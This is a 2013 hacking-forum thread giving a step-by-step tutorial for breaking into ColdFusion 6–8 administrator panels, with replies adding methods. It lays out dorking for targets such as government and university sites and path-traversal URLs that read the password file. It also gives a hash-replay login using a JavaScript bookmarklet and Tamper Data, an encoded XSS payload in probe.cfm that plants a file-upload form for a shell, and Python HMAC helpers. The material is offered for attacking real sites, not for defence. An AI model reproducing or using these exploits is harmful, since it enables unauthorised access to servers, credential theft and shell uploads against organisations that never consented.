+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: ColdFusion Hacking Tutorial (/Thread-ColdFusion-Hacking-Tutorial)
Pages:
1
2
ColdFusion Hacking Tutorial - Bannedshee - 02-21-2013
Cold Fusion Hacking Tutorial
Introduction
"ColdFusion is the name of a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications." - Wikipedia
ColdFusion is also extremely secure. Because of this, a lot of government websites use it, and so do many universities. Finding vulnerable websites takes a lot of time and patience. The only vulnerable version are 6,7, and 8.
Requirements/Needed materials
You will need:
- A VPN or Tor
- A Javascript Script that will be given later on
- Tamper Data
- Patience
Finding Vulnerable websites
Finding vulnerable websites takes a while. The most simple way to find them is using a google dork: ext:cfm. cfm is the file extension used by ColdFusion. In this tutorial, I will be using www.site.com as our website.
Testing if the website is vulnerable
Firstly get on a VPN or Tor. Now this part is a bit tricky because their are 2 parts. The 1st part is adding this to the end of your website: /CFIDE/administrator/. So it will be www.site.com/CFIDE/administrator/. /CFIDE/administrator/ is the location of the admin panel, which is what we're exploiting. If all goes according to plan, you should come across an admin panel that also will say the version of ColdFusion it's using. If it's under 6 or above 8, find a different website. The 2nd part is, if the version was 6-8, add (after /CFIDE/administrator/) :
- Version 6: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
- Version 7: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en?
- Version 8: enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e?n
If something like:
Code:
#Sat Feb 02 09:38:26 CET 2008 rdspassword= password=D132F5908A92640541ED7E8F44679D6C0E644D9A encrypted=trueShows up, it means the website is vulnerable. Now copy whatever is after password= until encrypter.
Exploiting the vulnerability
Now, add this script as a bookmark: javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
Then open Tamper Data. Go back to the website and paste the hashed password into the password bar, then click the javascript bookmark, then a window will pop up with another password, copy that. Go to tamper data and click start tampering. Go back to the website and click the login button. Tamper Data will alert you whether you want to tamper the data or cancel. Click the checkbox that says "Keep tampering" so that it stops tampering. Then click tamper. In the top right corner there will be a textbox that displays the hashed password. Replace that with the password that popped up in the box, and click ok. You should then, if done correctly, be in the CF panel.
Extra things
"There's also another method for example if failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm
To do to this add this to your URL:
Code:
www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3EIt exploits a zero day XSS attack in probe.cfm
Also if the j
Code:
jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))Here it is:
Code:
python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'To see the hash view the source and CTRL+F 'salt' and paste it in there, you should get the password in HMAC form and as Cyber said, do that with Tamper Data." - INST1NCT
I hope you enjoyed the tutorial!Brought to you by The Goons
RE: ColdFusion Hacking Tutorial - Kinanizer - 02-21-2013
Nice TUT cyber, keep it up.
Re: ColdFusion Hacking Tutorial - Dismas - 02-21-2013
Nice share. Just a heads up, you can use the Goons prefix (if you didn't already).
RE: ColdFusion Hacking Tutorial - Charon - 02-21-2013
Nice tutorial Cyber, although this is only 1 method on how to do it.
There's also another method for example if failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm
To do to this add this to your URL:
Code:
www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3EIt exploits a zero day XSS attack in probe.cfm
Also if the javascript:
Code:
jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))Here it is:
Code:
python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'To see the hash view the source and CTRL+F 'salt' and paste it in there, you should get the password in HMAC form and as you've said in your tutorial do that with Tamper Data.
Even though, it's still a good tutorial for the begginers.
RE: ColdFusion Hacking Tutorial - Keeper - 02-21-2013
(02-21-2013, 04:14 AM)Cyber-Savage Wrote:Brought to you by The Goons
O'rly? http://www.blackhatlibrary.net/Coldfusion_hacking
RE: ColdFusion Hacking Tutorial - Bannedshee - 02-21-2013
(02-21-2013, 09:09 PM)Keeper Wrote:(02-21-2013, 04:14 AM)Cyber-Savage Wrote:Brought to you by The Goons
O'rly? http://www.blackhatlibrary.net/Coldfusion_hacking
I wrote the whole tutorial by myself, that's another good tutorial though.
RE: ColdFusion Hacking Tutorial - Extimulate - 02-21-2013
Thanks, This will help me allot since I am new to ColdFusion hacking.
RE: ColdFusion Hacking Tutorial - BreShiE - 02-23-2013
Also, if you want to run the Python on Windows, just paste the following code into Notepad and save as whatever.py. Then navigate to where you saved the file (for example cd C:/users/breshie/desktop) and then just call the file name (whatever.py) - You must have Python installed to do this though.
Code:
#################################
# Made By BreShiE #
# www.anarchyforums.net #
#################################
import hashlib,hmac;
hash=raw_input("Hash > ")
salt=raw_input("Salt > ")
print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()RE: ColdFusion Hacking Tutorial - Charon - 02-23-2013
(02-23-2013, 04:11 PM)BreShiE Wrote: Also, if you want to run the Python on Windows, just paste the following code into Notepad and save as whatever.py. Then navigate to where you saved the file (for example cd C:/users/breshie/desktop) and then just call the file name (whatever.py) - You must have Python installed to do this though.
Code:#################################
# Made By BreShiE #
# www.anarchyforums.net #
#################################
import hashlib,hmac;
hash=raw_input("Hash > ")
salt=raw_input("Salt > ")
print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()
You'd need Python installed anyway if you would get the pass in HMAC form when using the python one-liner.
RE: ColdFusion Hacking Tutorial - Dyme - 02-28-2013
can sumone halp me idk how to do this...
could u please pm me ur skype?